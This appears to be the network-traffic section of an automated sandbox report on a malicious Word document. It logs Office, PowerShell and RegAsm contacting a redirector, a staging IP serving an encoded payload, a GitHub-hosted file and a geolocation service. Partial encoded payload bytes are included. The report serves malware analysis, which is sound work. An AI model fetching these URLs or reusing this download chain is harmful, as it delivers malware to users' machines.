                                                                                                                                Data Ascii: LLmAi"GhWiqZJuxoTiTaNcSLHSenOpWC = "RBckKoQlGLLALRIzLOGUvKnKKe"LWGoimffkWcZUffKLRiBpoUsCc = "tKqnLLzWCkNiLBlpBUpKhNKW


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.2249171104.168.7.8804004C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 1, 2024 09:25:29.432153940 CEST73OUTGET /510/RFGB.txt HTTP/1.1
                                                                                                                                Host: 104.168.7.8
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Oct 1, 2024 09:25:30.001705885 CEST1236INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:29 GMT
                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                Last-Modified: Tue, 01 Oct 2024 00:14:41 GMT
                                                                                                                                ETag: "a1000-6235f352a54ba"
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 659456
                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: text/plain
                                                                                                                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                Oct 1, 2024 09:25:30.001729012 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                                                                Oct 1, 2024 09:25:30.001740932 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                                                                Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                                                                Oct 1, 2024 09:25:30.001805067 CEST672INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                                                                                                Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                                                                                                Oct 1, 2024 09:25:30.001816034 CEST1236INData Raw: 67 78 4d 51 4d 44 43 7a 41 67 4d 34 4c 44 38 79 67 75 4d 67 4c 44 32 79 41 74 4d 49 4c 44 77 79 67 72 4d 77 4b 44 71 79 41 71 4d 59 4b 44 6b 79 67 6f 4d 41 4b 44 65 79 41 6e 4d 6f 4a 44 59 79 67 6c 4d 51 4a 44 53 79 41 6b 4d 34 49 44 4d 79 67 69
                                                                                                                                Data Ascii: gxMQMDCzAgM4LD8yguMgLD2yAtMILDwygrMwKDqyAqMYKDkygoMAKDeyAnMoJDYyglMQJDSyAkM4IDMygiMgIDGyAhMIIDAxgfMwHD6xAeMYHD0xgcMAHDuxAbMoGDoxgZMQGDixAYM4FDcxgWMgFDWxAVMIFDQxgTMwEDKxASMYEDExgQMAAD+wAPMoDD4wgNMQDDywAMM4CDswgKMgCDmwAJMICDgwgHMwBDawAGMYBDUwgEM
                                                                                                                                Oct 1, 2024 09:25:30.001827002 CEST1236INData Raw: 39 44 50 2f 51 7a 50 73 38 44 4a 2f 77 78 50 55 38 44 44 2f 51 67 50 38 37 44 39 2b 77 75 50 6b 37 44 33 2b 51 74 50 4d 37 44 78 2b 77 72 50 30 36 44 72 2b 51 71 50 63 36 44 6c 2b 77 6f 50 45 36 44 66 2b 51 6e 50 73 35 44 5a 33 77 38 4e 49 66 44
                                                                                                                                Data Ascii: 9DP/QzPs8DJ/wxPU8DD/QgP87D9+wuPk7D3+QtPM7Dx+wrP06Dr+QqPc6Dl+woPE6Df+QnPs5DZ3w8NIfDx3A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDi3Q4NAeDf3g3N0dDc3w2NodDZ3A2NcdDW3Q1NQdDT3g0NEdDQ3wzN4cDN3AzNscDK3QyNIcDB3AgNsbD62QuNgbD32gtNUbD02QkNAZDP2giNkYDI2whNYYDF2AhNMYDA
                                                                                                                                Oct 1, 2024 09:25:30.001837015 CEST1236INData Raw: 34 35 4e 4b 64 44 51 32 59 76 4e 75 62 54 6d 31 45 66 4e 73 57 54 6c 31 41 59 4e 58 56 54 45 30 73 39 4d 70 50 7a 6e 79 6f 61 4d 71 48 54 6d 78 38 55 4d 45 41 7a 2b 77 38 49 4d 47 43 54 43 77 41 41 41 41 41 41 55 41 55 41 49 41 38 54 66 2f 4d 6a
                                                                                                                                Data Ascii: 45NKdDQ2YvNubTm1EfNsWTl1AYNXVTE0s9MpPznyoaMqHTmx8UMEAz+w8IMGCTCwAAAAAAUAUAIA8Tf/MjP80Dz9cJPnyDl8wwOWvjA4gxN+eTT2YmNFVTz1waNWWTX0cPNITjn0UzMdNDEyYpMEGz+xULMyBAAAQEAFABA8ULPtyTp80JPWqT06UpODqTc68lONlDm28qNwZjX2wkN6YDK2YhNEUj81AeNOXDv1oaNYWDV1AEN
                                                                                                                                Oct 1, 2024 09:25:30.001852989 CEST1236INData Raw: 4d 7a 37 7a 6b 32 4d 59 4e 7a 51 7a 41 68 4d 75 4b 7a 70 78 77 64 4d 56 44 41 41 41 41 49 41 45 41 4c 41 41 41 67 50 6c 32 7a 71 39 55 43 50 52 76 6a 37 37 67 2b 4f 57 76 6a 6d 37 38 6f 4f 37 72 44 72 36 6f 6e 4f 4b 68 7a 53 34 30 43 4f 6d 67 6a
                                                                                                                                Data Ascii: Mz7zk2MYNzQzAhMuKzpxwdMVDAAAAIAEALAAAgPl2zq9UCPRvj77g+OWvjm78oO7rDr6onOKhzS40COmgjD4cwN4fD63E+NiSz1AAAA4AABgCwPt+Tk+QnP+0zk9MYPp0jB8ANP+yzh8wEPxwTA7g8OTtTR7A0OzsTH7cwOAoz358+NzfzI3QgNibDd2IlNCZTL2MSNCWTb1QWNXVDT0YPNuTTy0EMNTSDj0sHNxRzZ0AGNRRzS
                                                                                                                                Oct 1, 2024 09:25:30.002008915 CEST1236INData Raw: 63 6a 4d 75 49 54 48 78 67 66 4d 67 48 44 32 78 77 63 4d 36 47 54 6f 78 6b 5a 4d 53 47 44 68 78 63 58 4d 79 46 54 5a 78 41 57 4d 58 46 54 53 78 4d 55 4d 34 45 6a 4d 78 63 53 4d 66 45 44 46 78 34 41 4d 39 44 44 2b 77 6b 4f 4d 32 43 7a 6f 77 30 49
                                                                                                                                Data Ascii: cjMuITHxgfMgHD2xwcM6GToxkZMSGDhxcXMyFTZxAWMXFTSxMUM4EjMxcSMfEDFx4AM9DD+wkOM2Czow0IMBCDdw8GM5AzJAAAAkCABABAAA8z4/U2PO5Du+4mPW5zB9wfPj2jg8sNPKyjd8sGPgxzW8EFPMxjM8cxOqvj07o5O0tzV7EiO3rD24oLO1izh4YGOhhjL4cCOIcj/3g/NZfzz1sdNQXzl14YNjUTH1cRNNQTu0UKN
                                                                                                                                Oct 1, 2024 09:25:30.002022028 CEST1236INData Raw: 39 6a 52 2f 34 7a 50 4f 38 54 43 2f 51 67 50 34 37 54 30 2b 77 73 50 48 37 7a 75 2b 63 70 50 53 36 54 6a 2b 45 6f 50 64 35 44 57 2b 4d 6c 50 4b 35 7a 49 2b 34 68 50 5a 34 54 43 39 63 65 50 5a 33 54 7a 39 34 62 50 69 32 44 65 39 41 58 50 5a 31 54
                                                                                                                                Data Ascii: 9jR/4zPO8TC/QgP47T0+wsPH7zu+cpPS6Tj+EoPd5DW+MlPK5zI+4hPZ4TC9cePZ3Tz94bPi2De9AXPZ1TS90QPBoTn5IWO0kjL5IyNmfj4349Nafj13I9NOfjy3Y8NCfjv3o7N2ejs346Nqejp3I6Neejm3Y5NSejj3o4NGejg343N6djd3I3NudjaAAAAgCwAACAAAUjYAAAAMAwAwBwPQ/DW/UEPsyDq8QKPgyzm8YFPAsD/
                                                                                                                                Oct 1, 2024 09:25:30.006778002 CEST1236INData Raw: 73 46 50 44 78 7a 4c 38 63 79 4f 66 76 54 32 37 45 38 4f 62 75 6a 69 37 41 34 4f 68 70 6a 74 36 55 51 4f 58 6d 6a 69 35 55 59 4f 6b 6c 7a 58 35 6f 56 4f 4a 6c 7a 47 34 73 4c 4f 53 69 7a 51 33 73 2b 4e 53 66 6a 79 33 4d 36 4e 57 65 44 4f 33 34 79
                                                                                                                                Data Ascii: sFPDxzL8cyOfvT27E8Obuji7A4Ohpjt6UQOXmji5UYOklzX5oVOJlzG4sLOSizQ3s+NSfjy3M6NWeDO34yNccjF38gN6bD12MsNzazp2QpNBajM2YQNoWTl1kUNDVjI10RNTUDC04PN0Tj70gONiTD30oMNATDu00KNnSTo0oINCSTR00DNvQTJ0YBNLQjB0AwMnPj3zk9MKPjvzs6MjOzjzY4MBODezM3MsNTXzc1MKJDdyomM


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.2249174178.237.33.50802136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 1, 2024 09:25:34.168325901 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                Host: geoplugin.net
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Oct 1, 2024 09:25:34.799901009 CEST1170INHTTP/1.1 200 OK
                                                                                                                                date: Tue, 01 Oct 2024 07:25:34 GMT
                                                                                                                                server: Apache
                                                                                                                                content-length: 962
                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                cache-control: public, max-age=300
                                                                                                                                access-control-allow-origin: *
                                                                                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.2249161172.67.216.2444433348C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-10-01 07:25:06 UTC128OUTOPTIONS / HTTP/1.1
                                                                                                                                User-Agent: Microsoft Office Protocol Discovery
                                                                                                                                Host: og1.in
                                                                                                                                Content-Length: 0
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-10-01 07:25:07 UTC773INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:07 GMT
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                allow: GET,HEAD
                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                x-download-options: noopen
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ekKva5SgP5WafJDvfA3%2BH9PS%2Fm8b4SKru%2FqLduaP0qkRM5QoQVHTMv2u96RKeIN%2BI8fTnjVEVPDqGT92%2F%2BlNtQd5qNJbK0liLkDOSKu01M%2BKpHBs1g5EjEo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8cbab7857c15c434-EWR
                                                                                                                                2024-10-01 07:25:07 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                                                                                                Data Ascii: 8GET,HEAD
                                                                                                                                2024-10-01 07:25:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.2249162172.67.216.2444433348C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-10-01 07:25:08 UTC113OUTHEAD /9aubsm HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                Host: og1.in
                                                                                                                                2024-10-01 07:25:09 UTC929INHTTP/1.1 302 Found
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:09 GMT
                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                Content-Length: 182
                                                                                                                                Connection: close
                                                                                                                                location: http://104.168.7.8/510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc
                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                vary: Accept
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                x-download-options: noopen
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=db%2FAd4k1Oqc5bPWwNRw2ijD2QAuGiZMDUCBijfuHoocJ0LlX0XaH7knKtNcEaBKuRaYMRK%2Bk64lA9Y2U5v3dD6k3yusIzpmzvuBUc1KRgpSGMLPWL8wxUrE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8cbab78fd97e8c5d-EWR


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                2192.168.2.2249163172.67.216.244443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-10-01 07:25:12 UTC123OUTOPTIONS / HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                                                translate: f
                                                                                                                                Host: og1.in
                                                                                                                                2024-10-01 07:25:13 UTC765INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:13 GMT
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                allow: GET,HEAD
                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                x-download-options: noopen
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W67wC14BOwR4yCIlpHA4bHlZBpqw3magRYADv03Cv55daQRM%2FzvAEK0xAvyIgcGLyPw4JVMPylimEAf%2BnLDZ5vStunhBSoUFxxCnVw0NAGOhSAsf%2BiUdBlU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8cbab7ac58ef8c41-EWR
                                                                                                                                2024-10-01 07:25:13 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                                                                                                Data Ascii: 8GET,HEAD
                                                                                                                                2024-10-01 07:25:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.2249166172.67.216.2444433348C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-10-01 07:25:17 UTC343OUTGET /9aubsm HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                                                UA-CPU: AMD64
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Host: og1.in
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-10-01 07:25:18 UTC915INHTTP/1.1 302 Found
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:18 GMT
                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                Content-Length: 182
                                                                                                                                Connection: close
                                                                                                                                location: http://104.168.7.8/510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc
                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                vary: Accept
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                x-download-options: noopen
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 0
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MVJgi0wYnSiij2erDfnzIKocjuhrIJF6BiqUN8RfQMGVZtOkT2AKn%2BInwy6mCyDZXTxLclaaSjAoQpYmZETZ9X3427VRvYVSOjQIyeFPFxEM80Me4K4Fc5Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8cbab7cadb514263-EWR
                                                                                                                                2024-10-01 07:25:18 UTC182INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 37 2e 38 2f 35 31 30 2f 52 4e 2f 63 72 65 61 6d 62 61 6e 61 6e 61 63 61 6b 65 67 6f 6f 64 66 6f 72 6c 61 64 69 65 73 77 68 6f 6c 6f 76 65 74 68 65 62 61 6e 61 6e 61 73 61 6d 65 74 69 6d 65 73 68 65 6b 6e 6f 77 74 68 65 76 65 72 79 6e 69 63 65 69 64 65 61 64 73 6c 61 77 79 61 73 67 65 74 62 61 63 6b 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 6d 65 5f 5f 5f 5f 73 65 63 75 72 65 74 68 69 6e 67 73 61 72 65 69 6e 74 68 72 2e 64 6f 63
                                                                                                                                Data Ascii: Found. Redirecting to http://104.168.7.8/510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.2249168172.67.216.2444433348C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-10-01 07:25:20 UTC132OUTHEAD /9aubsm HTTP/1.1
                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                Host: og1.in
                                                                                                                                Content-Length: 0
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-10-01 07:25:21 UTC935INHTTP/1.1 302 Found
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:21 GMT
                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                Content-Length: 182
                                                                                                                                Connection: close
                                                                                                                                location: http://104.168.7.8/510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc
                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                vary: Accept
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                x-download-options: noopen
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yobdsxMxZhBha2gOS49UQKABkBSgRkwxyHrqf%2B5eUy%2BI9i%2BUx5HUz%2FW58pNVC%2BcIm5COMK2UE9ub03L9P9sLwPssKu9XqY5yPZwfpuHKvit2uKBzkRCyQCI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8cbab7dc38264362-EWR


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.2249170185.199.111.1334434004C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-10-01 07:25:27 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-10-01 07:25:27 UTC901INHTTP/1.1 200 OK
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 2935468
                                                                                                                                Cache-Control: max-age=300
                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                X-Frame-Options: deny
                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                X-GitHub-Request-Id: 5BED:6BAD6:C83CD5:D815A5:66FB95B1
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:27 GMT
                                                                                                                                Via: 1.1 varnish
                                                                                                                                X-Served-By: cache-ewr-kewr1740073-EWR
                                                                                                                                X-Cache: HIT
